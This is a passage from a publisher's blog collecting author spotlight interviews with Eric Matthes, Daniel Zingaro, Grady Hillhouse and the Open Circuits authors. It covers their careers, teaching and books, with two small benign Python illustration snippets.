No Starch Press's blog

Livin' the Dream with Python Crash Course Author Eric Matthes

 

[Cover of Python Crash Course, 3rd Edition]

This Author Spotlight is on Python programmer/educator extraordinaire Eric Matthes, author of the international bestseller (now in its third edition) Python Crash Course. In the following Q&A, we discuss how reader feedback shaped the latest edition of his book, why he chose teaching over a career in physics, the importance of applying new programming concepts to your own projects, and what Eric learned about life—and coding—from riding across the U.S. on a bicycle (five times).

Eric Matthes has been writing computer programs since childhood. For over a decade, he was a high school science and math teacher, as well as a Python programming educator. He now lives in Alaska as a full-time author and informal Python evangelist, making appearances on podcasts and at events like PyCon, where he hopes to meet you in person.


No Starch Press (NSP): Almost eight years ago, you wrote what has become the most popular Python programming book in the world. Even with well over a million readers of your work, you’re known for replying to pretty much every fan who emails you. How has such a high level of audience feedback informed the second and third editions of Python Crash Course? 

Eric Matthes (EM): When people decide to read a book like Python Crash Course, they’re making a pretty significant commitment. I want to know that when people start the book, they can make it through everything that interests them. So, when someone writes to me about something that’s not working for them, I want to help them if at all possible. The teacher in me can’t help but answer people’s questions.

When I respond to questions, I look for patterns in what people are asking about. When the book first came out and I noticed multiple people asking about the same parts of the book, I’d look at those sections to see how I might revise them to avoid common points of confusion. That feedback from readers helped shape the second edition in particular. Writing the second edition gave me the chance to bring all the code in the book up to date, but also allowed me to clarify numerous sections that weren’t written as well as they could have been.

I also post resources online to address the kinds of things people ask about. For example, I posted a full set of solutions early on, because having solutions available is a huge help to independent learners. I’ve posted recommendations about what resources might be most useful to people after finishing Python Crash Course, and some thoughts about how to find your first programming job. The cheat sheets that accompany the book have been downloaded millions of times.

Overall, I spend about 10 to 20 hours a week answering questions and keeping up with updates to Python and all the libraries the projects depend on. For example, over the last two weeks, I wrote a fully updated test suite for all the code in the book, which makes it easier to test any section of the book against new versions of Python and other dependencies. It surprises a lot of people to hear about all this ongoing work; I think most people assume that once a book is published, the work is done. But this is what keeps Python Crash Course relevant and effective through each new printing and each new edition. It’s mostly joyful work that puts me in touch with people from all over the world on a regular basis.
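The actual test suite Eric mentions isn’t shown here, but the general idea—automatically re-running a book’s code samples against the currently installed Python—can be sketched in a few lines. Everything below (the `check_snippet` helper and the sample snippets) is invented for illustration and is not from the real Python Crash Course tooling:

```python
# Illustrative sketch only: run book-style code snippets against the
# currently installed Python and record which ones still work.

def check_snippet(source: str) -> bool:
    """Compile and execute a snippet in a fresh namespace.

    Returns True if the snippet runs without raising, False otherwise.
    """
    try:
        exec(compile(source, "<snippet>", "exec"), {})
        return True
    except Exception:
        return False

# A few made-up snippets, including one that should fail.
snippets = {
    "hello": 'print("Hello, Python!")',
    "loop": "total = sum(range(5))\nassert total == 10",
    "broken": "print(undefined_name)",
}

results = {name: check_snippet(src) for name, src in snippets.items()}
```

In a real suite, the snippets would be pulled from the book’s source files, and a runner such as pytest would parametrize over them so a failure pinpoints exactly which section broke under a new version of Python or a dependency.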

 

NSP: Would you share a little about how you got to where you are today? Specifically, how did you go from studying chemical engineering in college (with plans of becoming a particle physicist) to becoming a public-school teacher and, later, a full-time author?

EM: I had a really good high school chemistry class, so I started college with a major in chemical engineering. But after a semester I changed my major to physics—I just loved the quest to understand the universe at the most fundamental levels.

I loved math and science, but I also noticed how many of my peers hated those two subjects. I joined a volunteer tutoring program and noticed that most of the people who came to us for help enjoyed the same subjects I did—it was just the way they’d been taught that wasn’t working for them. That tutoring work really opened my eyes to the impact of good (and bad) teaching.

I wanted to be a particle physicist, but I didn’t want to be a student forever. I tried teaching and found that the challenge of trying to reach every student in a class was as satisfying as hard science. I never really looked back from teaching. I taught middle school math and science for seven years in New York City and then transitioned to high school when I moved to Alaska.

My father was a software engineer in the ’70s and ’80s, so I learned the basics of programming as a kid. (That was a time when people were just starting to have computers in their homes.) I was a hobbyist programmer all my life, and I’d teach intro programming classes whenever I could. In the early 2010s, I was looking for a book I could give to my more motivated students so they could work at their own pace. I was frustrated to find, however, that every book available back then was either aimed at little kids or made too many assumptions about what people already knew.

I decided to write a book that reflected the way I teach: a focus on just enough fundamentals to start doing meaningful projects. I wrote Python Crash Course for “anyone old enough to not want a kids’ book.” It has met that goal beyond my wildest hopes. When the book first came out, I got a handwritten letter from a 10-year-old who said thank you for writing a book they could learn so easily from. I regularly get emails from people in their 70s and 80s who are finally learning programming to satisfy their curiosity or to keep their minds active. And I hear from everyone in between: high school students, undergrad and graduate students, and a whole bunch of people who are already working but are looking to make a career change. These emails, and conversations at conferences, are the highlight of my writing career.

 

NSP: Speaking of teaching, your early career in the field is what led to a chance encounter with No Starch Press's founder, Bill Pollock, following a lightning talk you gave at PyCon in 2013 about improving education by taking ideas from the programming world. (Tough crowd!) How did your appearance at the conference result in a publishing deal, and had you been thinking about writing a book at that point in your life?

EM: I first went to PyCon in 2012 because I wanted to do something meaningful with the programming skills I’d been informally building all my life. I was starting to build some tools that would help students navigate school better, and help teachers focus on teaching well. For example, I wrote a program that ingested students’ text-based transcripts, which were really hard to read, and generated a visual transcript for each student. You could look at one of these transcripts and in 30 seconds see what a student’s strengths and weaknesses were, and what they needed to focus on in order to graduate. That project didn’t just save time—it changed the nature of many conferences with students and their families. Instead of focusing on the frustrating process of trying to decipher a transcript, the focus was on celebrating successes and how to meet ongoing needs.
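Eric’s transcript tool itself isn’t reproduced here, but the core idea—turning hard-to-read text records into a quick per-student summary that a visual transcript could be built from—might look something like this. The record format and field names below are made up for illustration:

```python
# Hypothetical sketch: summarize text-based transcript records into
# per-subject credit totals. The "subject,course,credits,grade" line
# format is invented for this example.

from collections import defaultdict

def summarize_transcript(lines):
    """Return total credits earned per subject from CSV-like lines."""
    credits = defaultdict(float)
    for line in lines:
        subject, course, earned, grade = line.strip().split(",")
        if grade != "F":  # only passing grades count toward graduation
            credits[subject] += float(earned)
    return dict(credits)

sample = [
    "Math,Algebra I,1.0,B",
    "Math,Geometry,1.0,A",
    "Science,Biology,1.0,F",
]
```

A visual transcript could then be generated from a summary like this, for example by plotting each subject’s earned credits against the credits required to graduate, so strengths and gaps are visible at a glance.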

I gave a lightning talk in 2013 about how we could bring the well-established concept of openness in programming into the education world, in a way that goes beyond free software. Bill was in the audience, and he’d been having his own frustrations with the school system at that time. He said something along the lines of, “I like what you have to say about education. If you ever want to write a book, feel free to submit a proposal.” Some early No Starch books had been really influential in my life, so that invitation was compelling. I got my start on Linux by reading Ubuntu for Non-Geeks.

I didn’t really want to write a book, because I was focused on those educational infrastructure projects. But when I got back from the conference, I saw a handwritten poster I had put up in my classroom. It was titled “What’s the least you need to know about programming in order to work on your own projects?” I had listed out the most fundamental concepts of programming, along with three suggestions for projects: a video game, a data visualization project, and a web app. I realized that the poster was the table of contents of the book I wished I could teach from, and I basically turned that poster into a book proposal.

I naively thought I could write the book during the summer and edit it during the following school year. That turned into two and a half years of early mornings and late nights! But it was very much worthwhile; Python Crash Course has reached a global audience that I could hardly dream of back then. I kept teaching full-time until 2019. But I couldn’t continue to teach well and write well, so I left the classroom to focus full-time on writing and programming.

 

NSP: While we’re on the subject of conferences, you encourage your fans to go to events like PyCon or local coding meetups—that is, places where they can benefit from taking part in some sort of Pythonista community. Why do you believe it’s important for programmers (of every skill level) to step away from their monitor and go meet people?

EM: As a programmer, especially if you’re new to the field, it’s so easy to get stuck in your own head. It’s tempting to keep telling yourself you’re not good enough yet, that when you just learn a little more you’ll be ready to meet others and talk about programming. But when you step into a Python space—a meetup, a conference, an organized online event—you’ll almost always meet people you have something in common with.

You’ll definitely meet people who know more about Python than you do. But you’ll also probably meet people who are even newer to the field than you are. You’ll find people who are working on problems you’re interested in, and you’ll be inspired in ways you just can’t predict.

Some of what you hear will go over your head, but that’s quite fine. The concepts you hear about but don’t understand yet will be more familiar when you come across them later in your own work. And they won’t be dry concepts then—you’ll have a face you can connect to that topic. 

There’s also a fair chance you’ll make some lifelong friends, especially if you end up staying in the Python community for a while.

 

NSP: Given that PCC has been a bestseller for the better part of a decade, you probably come across people who read the book years ago and are now really advanced and/or professional Python programmers. Got any tips on how to continue making progress for those who only recently finished the book? Put another way: How does someone go from beginner to expert programmer, and is that even necessary in order to have success in the field of programming?

EM: That happened much faster than I thought it would! I remember talking to someone at a booth at the second conference after the book came out. They were explaining something technical about what their company does, and halfway through they realized who I was. They stopped what they were saying to share how much Python Crash Course had helped them get started in programming. Then they continued their explanation of an area of programming I hadn’t used much and didn’t fully understand. As an author, that was a very satisfying experience!

In the early days of Python, it was pretty reasonable to aim for mastery of the entire language. It wasn’t that big, and back then the community was a lot smaller as well. These days, Python is huge; it would be really hard to know every part of the language in depth. There are plenty of Python maintainers who know one part of the language well, but who wouldn’t consider themselves an expert in other areas. It’s just too big and touches too many specialized areas.

We all know what a beginner is because it’s relatively easy to define. But there’s no clear definition of “intermediate” or “advanced.” I would advise people to learn one language well enough that they can use it to solve meaningful, real-world problems without having to follow a step-by-step tutorial. That doesn’t mean you need to be able to write code from memory. It’s perfectly fine to look back at the tutorials and resources you’ve learned from as you’re working on your own projects.

The best advice I can give once you’ve learned the basics is to keep learning fundamental concepts, but make sure you’re applying those concepts in a variety of real-world projects. There are a lot of concepts in programming that you can’t fully make sense of until you’ve had the chance to apply them in a variety of contexts.

 

NSP: Let’s talk about your passion for projects, then. Python Crash Course is peppered with a number of them—including a Space Invaders–style video game—and these endeavors definitely contribute to the book’s effectiveness. Would you explain your philosophy that programmers should always have a project in mind? Bonus question: Care to share any cool projects that you are working on right now?

EM: Nobody really learns programming just to write lines of code. The code we write is only meaningful if it actually does something we (or someone else) cares about. If you have a project you’re yearning to build, you’re almost certainly going to be a more active, engaged learner. Every time a new concept comes up, you’ll ask yourself how that concept might help you implement your project. This pushes you to think more deeply about each new concept and try using it in different ways, until you start to internalize that concept.

At the same time, you probably shouldn’t just focus on one large project. It’s helpful to take on some smaller projects that you can complete, and practice the art of “finishing” a project. No codebase is perfect, so learning to recognize when a project is “good enough” is a tremendously valuable skill.

I always have a number of projects going on. I write a weekly newsletter called Mostly Python, and it consists of individual, one-off posts and series about specific topics. I’m working on a program that will convert these series into mini-ebooks. I’m working on django-simple-deploy, a project that automates configuration and deployment for Django projects. I’m slowly learning piano, and I had a hard time learning all the notes of the grand staff well enough to focus on actually playing music. I made an old-school JavaScript site that facilitates learning the notes, and after using it for two weeks, I’m now the fastest student at naming all the notes. (That really means I’m faster than a bunch of fifth graders, but it still feels good.) I’m going to polish that a bit more and then share it more widely.

 

NSP: Last question. A surprising detail about your life is that you’ve bicycled across the US [checks notes] five times—in fact, you quit your job at one point and lived on a bike for an entire year! Are there any lessons you learned during those hundreds (thousands?) of hours of pedaling that can be applied to the world of Python programming?

EM: Yes, it was thousands of hours of pedaling!

When I was in my 20s and had a few years of teaching behind me, everyone was focused on getting master’s degrees. I just wanted to live outside during the summer, so I biked across the US for two summers in a row. I rode across the northern states one summer and then took a southern route the next summer. Those were such good experiences, I quit my job so I could live outside for a full year. I rode from Seattle to Maine, down to Florida, over to California, and up to Alaska. I had a conviction that I’d learn more from that kind of journey than I would from getting a master’s degree, and looking back, it was definitely the right choice for me.

One thing I took away from that trip was a deep reserve of calm from having faced everything that a year of living outside brings: beautiful sunny days in wild places, sleety mountain passes, sleeping in a tent for weeks at a time with bears, and so much more. Another big life lesson was a better understanding of all the different ways people live their lives. When you travel alone for an extended period without an engine, people open up in a different way. This was before social media, smartphones, Google Maps, and photo-sharing sites. I stopped a lot to ask directions, and just talk to people on the side of the road. Mostly, I just listened—people want to tell you about the place they live, and many people want to share their life story when you’re outside and don’t have a schedule. People would say, “I wish I could just take off and live on a bike...” and then they’d open up and tell really honest stories about their lives. I think that happened a lot because people knew I was just passing through, and they’d never see me again.

I learned empathy from listening to so many different people. When I write code, I think about the people who will use what I’m making, and I consider who might be negatively impacted by whatever I contribute to. I enjoy time in front of a computer more because of the time I’ve spent far away from a computer. When I deal with stressful bugs and crashes, I remind myself, “At least I’m not facing a bear alone on the side of a gravel road in the far north of British Columbia right now.”

I believe most programmers benefit from having nontechnical hobbies. Anything you find meaning in away from a computer helps keep your technical work in perspective. Keeping things in perspective is really helpful in a yearslong technical career.

Finishing that trip made it easier to write a book because I had a sense of how to bring a long-term project to completion. In some sense, a 14,000-mile bike trip is nothing more than a whole bunch of individual pedal strokes. When I feel like I’ll never get to the end of a long project, I often think back to hard days of riding and remind myself that every step forward is meaningful. That’s more than just a passing thought, though. It brings back the feeling of living outside on a daily basis. I miss those days, but I’ll carry them with me for the rest of my life.

For anyone interested in hearing more about those adventures, I wrote a book about the trip a while back. It’s kind of funny to be the author of one book that’s sold over a million copies, and another that’s sold about a hundred copies. But I wrote that book more to solidify the memories than to reach a wide audience. 

Solving Problems with Algorithms-Ace Dan Zingaro

 

[Cover of Algorithmic Thinking, 2nd Edition]

Our latest Author Spotlight is on computer-science whiz Daniel Zingaro, author of Algorithmic Thinking as well as its soon-to-be-published second edition, and Learn to Code by Solving Problems (2021). In the following Q&A, we talk with Dan about his favorite childhood computing memory, how he went from nearly dropping out of CS classes at university to teaching them, the accessibility tools that helped him become a programmer despite being severely visually impaired, and why fellow educators should feel empowered to write books about the subjects they teach.

Daniel Zingaro, PhD, is an award-winning associate professor of Mathematical and Computational Sciences at the University of Toronto Mississauga, where he is well-known for his uniquely interactive approach to teaching, and internationally recognized for his expertise in Active Learning. In addition to writing, educating, and researching, Zingaro is one of our go-to technical editors, whose work includes Python for Kids, 2nd Edition (2022), Data Structures the Fun Way (2022), Python for Data Science (2022), and Python One-Liners (2020).


No Starch Press: Congratulations on the second edition of Algorithmic Thinking! One of the things that really makes it unique is your show-not-tell approach to teaching algorithms, where you present the problem first and then guide the reader toward finding the fastest, cleverest solution. It can’t be a coincidence that you’re also an award-winning college professor known for your “active learning” method. Did your experience as an educator influence the way you wrote the book?

 
Daniel Zingaro: Oh, definitely. I've learned so much about teaching from my students, and I always try to incorporate as much of that as I can into my writing. The reason I flipped the book to be "problem first, material second," rather than the opposite, is because many people are not motivated to learn abstract stuff without understanding why it might be useful or matter to them. If I can have a reader read a description of a problem and be like, "Yo! I don't know how to solve this thing," then I feel like the real learning can begin.
 
I've also tried to make the book inviting to students who might otherwise not feel welcome. For example, I didn't put proofs or theorems or much math in there, because I know what that stuff does to many students: "Theorem 1: let x, y, and z be ... oh hey look, a new YouTube video!" So why force students to learn in a specific way? Because we happened to learn that way? Because that's the only way to teach it? Those reasons aren't acceptable to me. Students provide constraints on how they want to learn. If we professors are all we think we're cracked up to be, let's rise to this challenge and teach under those constraints. There's no right way to teach. If someone (like, literally, I mean one person) learns from it, then it is right.

 
NSP: It’s hard to believe that you twice came close to dropping out of Computer Science while attending university — and nearly failed a course that you later went on to teach. But it must be true because you disclose this personal trivia to your students. Why is it important for you to be so open about your past struggles?
 
DZ: It's true! I really need to dig out my old transcript and post it online for students so they can see my nearly failed grade. It's very important to me to share these low points with students because many students experience low points of their own. The way I connect with the world is through humor and making personal connections. If there's anything I can share with people that helps me make these connections, then I will do it. 
 
My waffling on whether to drop out of Computer Science, and suffering some poor grades, offer ways for me to make these connections. How funny, right? A professor that almost failed a course? It's really too bad that it's funny – I mean, the only reason it's funny is because it's so rare. With the poor grades and other challenges, I'm fortunate to have still gotten here. But I did, somehow. I figure that maybe my struggles can somehow help someone else with their own struggles.

 
NSP: Let’s talk about accessible computing for a moment. A lot of our readers may be surprised to learn that you’ve been blind your entire life, which would put you in the very small category of visually impaired students who successfully learn programming and earn advanced degrees in the subject. What adaptive tools helped you overcome the challenges you faced? And, how has the level of accessibility in computing evolved?
 
DZ: Yep – that's why my books don't have any extraneous pictures. Or cute sidebars. Or cute icons.
 
The computing tools for accessibility these days are making huge advances. I use the free NVDA screen-reader to do all of my computing tasks. But looking back, the tools only helped me because my parents gave me the opportunity for the tools to help me. My parents are in the Acknowledgements section of my book because, without them, there is no book, there is no career, there is no who-knows-what-else. If you have a disability or are otherwise being excluded, then (if it's safe to do so): advocate for yourself. That's what I learned from them. Could I have advocated for myself otherwise? Could I have advocated if I didn't feel safe in Canada doing so? Probably not. That's scary. I may have worked hard, but the world gave me the opportunity for my work to mean something. How many people work even harder and never have the opportunity to benefit? That's a tragedy.
 
I try to use one of my lectures every year to show my students the tools that I use to teach. They're computer scientists and are going to be building tools that all of us will use in the future, so I like to show them how much accessibility matters, for real, to a real person. And I always start with a 10-minute discussion of how I hope they interpret what I'm about to show them. It seems natural for them to hear my super-fast screen-reader speech, or the handheld device I use to read Braille, and be like, "holy cow, Dan is epic!" But I'm not. The tools are epic. Actually, wait; that's not quite it. We're all epic. Many people can read or write or do amazing things. And, yeah, the way that most (non-visually impaired) people do it is different than how I do it – but at the end of the day, the technology exists and makes it so that I can do it, too.
 
Also, a big shout-out to everyone who cares about accessibility and/or works to make software or processes or the world in general more accessible. We need people (including ourselves) to encourage us, and we need the accessibility tools to realize that encouragement.

 
NSP: Another thing our readers might not know about you is that you're the technical editor behind some of our bestselling books, including Data Structures the Fun Way and the new edition of Python for Kids. Since you've already made a name for yourself as a writer, what drew you to the unsung-hero role of technical editing, and can you tell us a little about what you actually do in that regard?
 
DZ: I find technical editing to be quite fun. I find learning fun, and editing books helps me sharpen what I know about a particular topic, so it's kind of fun by default. I also welcome the opportunity to help authors produce even better books. It's the best when there's an author doing great work, and I can in some small way help that author even further. Sometimes I'll be editing a book and think, "dang, this is so good! Why couldn't I have written this?" But, the reason is that I couldn't write their book even if I tried. The author has a particular voice, a particular expertise. Editing permits me to revel in that expertise, to just be grateful for the fact that here we have another author who has the ability and opportunity and life circumstances to share what they know.
 
What I do when editing is annoy the author with every tiny improvement/possible improvement that I can think of. (No, really – ask them.) I check all of the code and text, of course, but that's not my favorite part. My favorite part is using what I know about teaching to offer suggestions where I suspect learners may get particularly stuck. A lot of the topics covered in these books are ones I haven't taught before, and even if I have, I know only a small amount about where and why learners do or do not make progress. The challenge really never goes away, that's for sure, but I welcome any opportunity to try my best to be helpful given what I do know.
 
 
NSP: Like many of our authors, you’ve been into programming since you were young. What’s your earliest memory of enjoying computing, and when did it go from being a hobby to a career path?
 
DZ: One of my earliest computing memories also happens to be one of my favorites. My family was trying to get me a computer loaned to us with screen-reading technology on it (as it was expensive in those days and involved several interacting software and hardware devices). We were at an assessment center to look at some models, and my dad and some employees were talking about computery stuff that I didn't understand. Honestly, all I wanted to do was play a computer game or type something funny on the screen, but the adults just kept talking. Finally they stopped and wanted me to try out three different types of computers to see which one I could best work with. I started with the first computer, typing a little story. And then I managed to do what turned out to be the best thing ever: I froze the machine. But not just a normal freeze, a hilarious freeze where the screen-reader thing kept repeating the same “ah ah ah” syllable again and again, with no way to stop it. All of the fancy computery people were trying fancy things but simply could not make it stop. I was doing my absolute best not to laugh, because I desperately wanted the chance to take home a computer that day. Eventually they gave up and had to completely shut it down by flicking the power switch. Once they did that, I just couldn't hold it in anymore and burst out laughing (while also realizing I probably blew my chance at getting them to give me a PC). But, no! It turns out that they were actually impressed that I had successfully frozen the computer, and agreed to loan it to us on the spot. Looking back, I didn't do anything impressive – probably just pressed a bunch of keys at the same time or some such nonsense.
 
Presently, I'd say I'm more of a teacher-person than a computer-person. Computing happens to be the thing that I can apparently teach best, but I get my true motivation from teaching in and of itself. I often catch myself learning something new and then immediately thinking about how I might teach it. Or I'll solve a computing problem and then be thinking about which chapter of a book it might serve as an example in.
 
 
NSP: You’ve been a professor at UT-Mississauga for nearly a decade now. What’s the most significant thing you’ve discovered about teaching Computer Science in all that time?
 
DZ: The most significant thing I've learned is that every book is total junk for a subset of students. For any one of the textbooks I use – say, a classic CS book – there is a subset of students for whom that book just doesn't work. In fact, my happiest teaching days usually involve a student telling me that my book isn't working for them. Now, it might not be their happiest day, because then I try to drag them into a two-hour conversation about why it isn’t working. But I really do want to learn from them and try to do better. And they know how passionate I am about learning, so I don't feel too bad about that!

 
NSP: Much like sky-diving, writing a book takes a leap of faith — and you’ve done both. What advice can you offer to fellow CS educators who have thought about becoming an author but are scared to make the jump?
 
DZ: I'm married now, and I'm pretty sure I signed some wedding papers that make me not allowed to skydive anymore. (I'm guessing that book-writing is still okay, though.)
 
I think CS educators are in a unique position to write books that teach. They have so much experience in the classroom, and I myself was surprised how much of it I was able to carry over into my writing. I'm not an algorithms researcher. I don't know a whole lot more about algorithms than what I put into the book. (You'll know that I learned new algorithm stuff if you ever see a third edition of Algorithmic Thinking!) But, you know what? I think not being an algorithms researcher was a blessing for this book. I'm not so far removed from remembering how challenging it was for me to learn these concepts the first time. And the approaches I know best are the general (not specialized) ones that are applicable to a wide variety of problems that programmers might run into in the wild. I hope readers can see in every chapter how excited I am to learn even more about algorithms, and I hope that excitement helps fuel their own excitement.
 
So, say you teach a web programming course. Or an architecture course. You've tuned it. Your students respond well. Who cares if you're not the foremost expert on web programming or architecture? You're a teacher who knows how to connect with students and, as such, your book is valuable.
 

Ride-Along with Engineer Grady Hillhouse, the Ultimate Road Trip Buddy

 

Cover of Engineering in Plain Sight

New year, new spotlight—and this one shines on civil engineer and YouTube star Grady Hillhouse. His first book, Engineering in Plain Sight, was released this past fall to critical acclaim. In the following Q&A, we talk with Grady about how he went from civil engineer to full-time video producer with over 3 million subscribers (hint: woodworking), why all he needed to know about science communication he learned in kindergarten, the importance of average citizens understanding how things work, and the joy of "infrastructure spotting" on the road.

 

Grady Hillhouse is a civil engineer and science communicator widely known for his educational video series “Practical Engineering,” currently one of the largest engineering channels on YouTube, with millions of views each month. His videos, which focus on infrastructure and the human-made environment, have garnered media attention from around the world and been featured on the Science Channel, the Discovery Channel, and in many publications. Before producing videos full-time, Grady worked as an engineering consultant, focusing primarily on dams and hydraulic structures. He holds degrees from Texas State University and Texas A&M University.


No Starch Press: You got your bachelor’s degree in geography, then later earned a master’s degree in civil engineering, and spent nearly a decade working in the field on infrastructure projects. How did you go from that path to becoming a full-time YouTube sensation?

Grady Hillhouse: Making YouTube videos started as a hobby for me when I was given some woodworking tools. I wanted to learn to use them, and of course, I went to YouTube to watch tutorials. What I found was a community of woodworkers producing videos of their projects and sharing them with each other. I was so fascinated that YouTube could be used in a social way (I had only thought of it as a search engine for videos), and I wanted to be a part of the community. Over time, I started including some engineering in my woodworking videos. Eventually I realized that I really enjoy sharing my passion and experience in engineering with others, and I decided to focus on that topic.
 
I continued making videos about engineering and infrastructure in my free time, and worked to make them better and better. When my first son was born, all that free time I had to make videos vanished. I was forced to make a choice between sticking with my career in engineering or finding a way to support my family with my hobby. Ultimately, I decided I could have a bigger impact on the world producing videos (and writing a book). If everything comes crashing down, I still have my engineering license to fall back on!

 
NSP: You clearly have a genuine passion for the built environment—it shines through in every one of your YouTube videos and all throughout the new book. So, chicken or the egg: Did this interest spring from your graduate studies and (initial) profession, or did your fervor for infrastructure influence your academic and career pursuits?
 
GH: I have been interested in how things work since I was a kid, but my passion for infrastructure really didn’t come until college. My undergraduate classes in water resources are really what led me into civil engineering. My engineering classes are where my eyes were opened to all the “hidden in plain sight” details of the built environment. Every class was like turning on a lamp to illuminate some innocuous part of the constructed environment that I had never noticed before, and I haven’t stopped paying attention since.

 
NSP: Like Bill Nye and Neil deGrasse Tyson, you’re known as a “science communicator.” But one thing engineers are not typically known for is the ability to explain complex technical processes in laypeople's terms. What’s your trick for translating “engineer speak” into engaging, accessible content without dumbing it down?
 
GH: My wife was a kindergarten teacher when I first started working as an engineer, and I once got invited to her elementary school to give a presentation about civil engineering. I built a model that shows the different purposes of a dam and reservoir. The first presentation I gave went really well. It seemed like the kids were interested in what I had to say, but I also noticed that I was getting questions from the teachers. So for the next few classes, I started paying attention to the teachers and administrators in the back as I went through my presentation, and was surprised at how attentive they were.
 
It slowly kind of dawned on me over the course of those five or six presentations that, when I talked about my career to adults, I was usually trying to make myself sound smart and dignified while avoiding dumbing things down or accidentally patronizing someone. But when I was talking to students, I didn’t have those pretenses.
 
I’ve basically spent the past 10 years reminding myself that the average adult knows just as much about civil engineering as your average kindergartner. Half of civil engineers just think about dirt and rock all day. We have no good reason to pretend to be so dignified. It’s not just how you keep the interest of a bunch of kindergartners for 15 minutes; it’s how you reach an audience on their level.

 
NSP: Your book is an “illustrated field guide to the constructed environment” and, indeed, the simple yet incredibly detailed illustrations of every structure being explained on the page really highlight why they should be seen as “monuments to the solutions to hundreds of practical engineering problems,” as you put it. How did these awesome little artistic renderings come about?
 
GH: The idea for the book was very much rooted in the idea that there are all kinds of structures and devices that we see out in the world but can’t identify, and really, can’t even do an internet search for because they are quite difficult to describe. So, each section focuses on the parts of infrastructure that you can see. Just like using a field guide to birds or plants or rocks, as you slowly start to learn the names and purposes of what you can observe, it makes being outside a lot more fun. It gives you something to pay attention to on walks or road trips.
 
When I was a kid, one of my favorite things to do while bored was to open an encyclopedia up to a random page and read about what I found. I really wanted readers to be able to use Engineering in Plain Sight the same way: just open to any page and find something interesting. I worked really hard with my graphics team at MUTI to make each one of the illustrations as rich and full of detail as possible, and I’m so proud of what we came up with together.

 
NSP: Similar to your YouTube channel, “Practical Engineering,” the book has gotten an amazing response from a wide-ranging audience. And I think it’s fair to say that the majority of people who pre-ordered the book or put it on their holiday wish-list were not, in fact, engineers (though it's been popular in engineering circles, too). Why do you think the rest of us are so captivated by getting an inside look at how cell towers, highways, levees—the built world—actually works?
 
GH: It’s hard to say for sure! But, I suspect part of it is that these structures really are in plain sight. Learning something new about some seemingly mundane part of your immediate surroundings is magical. My favorite comment to get on a video is, “I didn’t even realize I was curious about this until you asked the question.”

 
NSP: A few months ago, you did a “Practical Engineering” video on a massive—and massively troubled—South Texas bridge project. For those who live in the area, like yourself, it’s a local issue. But your “Harbor Bridge” episode now has over 1.6 million views and nearly 3,000 comments. Do you think that helping people understand the infrastructure in their community (and how it can fail) is a way to strengthen civic engagement through a more informed citizenry?
 
GH: I really do believe we need to understand our connection to the constructed environment to care for it and to invest in it, which means we need to know at least a little bit about how it works. Our lives rely on many types of infrastructure: roads, bridges, dams, sewers, pipelines, retaining walls, water towers—these structures form the basic pillars of modern society. 
 
And the decisions we make about infrastructure—where to build it, how to pay for it, and when we maintain it—have consequences that affect everyone in powerful and fundamental ways. So, we need everyone to be involved in those decisions, not just engineers and bureaucrats. We all carry some responsibility for how the world is built around us. Investment in infrastructure requires that we value and appreciate it first, and so that’s what I try to do with my videos and the book.

 
NSP: In addition to opening everyone’s eyes to the feats of infrastructure that surround and support our modern lives, you’ve also introduced us to the oddly joyful pastime of “infrastructure spotting”—something you apparently still get a kick out of. In fact, you note that your “entire life is essentially a treasure hunt for all the interesting little details of the constructed world.” (I bet you’re fun on road trips!) What fuels your ongoing enthusiasm and sense of wonder for the built environment, given you literally wrote the book on the subject?

GH: In any city I visit, I want to learn where they get their water, how their electrical grid is set up, how they manage drainage and flooding and transit and wastewater, et cetera. There is so much variety in how we solve difficult challenges through infrastructure. Plus, we’re always building new things and using new technologies. So, there’s almost always something new to see wherever you go!  

 

Cutting It Up with Open Circuits' Windell Oskay & Eric Schlaepfer

 

Aglow in our Author Spotlight series this month are the daring duo behind Open Circuits: The Inner Beauty of Electronic Components—Windell Oskay and Eric Schlaepfer. Their book is a truly unique photographic exploration of the astonishing design hiding in everyday electronics, and it's as awesome as it sounds. In the following Q&A, we talk with Eric and Windell about how this project came about, the ins and outs of the hardware disassembly and macro-photography feats it took to make the book, the surprises—both good and bad—that they encountered along the way, and the many challenges of cutting a cathode ray tube in two.


Eric is a hardware engineer at Google, and runs the popular Twitter account @TubeTimeUS, where he posts cross-section photos, discusses retrocomputing and reverse engineering, and investigates engineering accidents. His better-known projects are the MOnSter 6502 (the world’s largest 6502 microprocessor, made out of individual transistors) and the Snark Barker (a retro recreation of the famous Sound Blaster sound card).

Windell is the co-founder of Evil Mad Scientist Laboratories, where he designs robots and produces DIY and open source hardware “for art, education, and world domination.” A longtime photographer, he holds a B.A. in Physics and Mathematics from Lake Forest College and a Ph.D. in Physics from the University of Texas at Austin. Besides Open Circuits, he's the author of The Annotated Build-It-Yourself Science Laboratory (Maker Media, 2015).


No Starch Press: First of all, congratulations on all the hard work paying off. The response to your book has been incredible. Considering how popular cross-section pictures were when I was a kid, I guess it’s not too surprising. People still love peeking into things full of hidden complexities! But the books I remember were mostly just intricate drawings—for Open Circuits, you actually photographed real stuff that you cut in half. What inspired this project? Did you intend to add a whole new dimension to the “cutaway” genre?

Eric Schlaepfer: I grew up fascinated by cross sections and cutaways. I’m sure that influenced this book, but it’s not exactly what inspired me. It was a broken piece of equipment, and the problem was one of the electrical components (a tantalum capacitor similar to the one on page 40). I sanded it in half to see if I could figure out how it failed, tweeted a photo, and folks really enjoyed it. So I started cutting other parts in half, and that led to the book.

Windell Oskay: I’ve always been interested in how things are made, in addition to how they work and what’s inside them. One of the really remarkable things about physically cutting things is that you get to see so many features that are maybe incidental to the function of the device, but are signatures of the processes that went into making it. Each part tells a story. And, often, we’re not even saying anything about them. Those little stories are left for the readers to discover.

 

NSP: The two of you have professionally intersected over the years in Silicon Valley, and have worked together on some design projects for Evil Mad Scientist Laboratories. But who roped whom into this book idea? What compelled you to collaborate at such a level?

ES: We’ve worked together on a number of other projects, such as the Three Fives discrete 555 timer kit, as well as the world’s largest 6502 microprocessor—the MOnSter 6502. Windell had seen my photos on Twitter, and we started talking about how to turn them into a book. I don’t remember all the details, but it was a very natural thing.

WO: We’ve had a number of fruitful collaborations. In addition to those that Eric mentioned, we also designed an educational project, “Uncovering the Silicon,” that we presented at Maker Faire (along with Ken Shirriff, our technical reviewer for Open Circuits, and John McMaster, who prepared some subjects for photography). In that project, we placed very simple integrated circuits under a microscope and showed how they worked by tracing their individual parts. There’s a sense in which our book is a successor to that project—we’re letting people look at things up close, and then talking through how they work. But, I think that there was actually a moment when I roped Eric into the book idea after seeing his early cross-section photos.

 

NSP: What was the most challenging aspect of putting this book together?

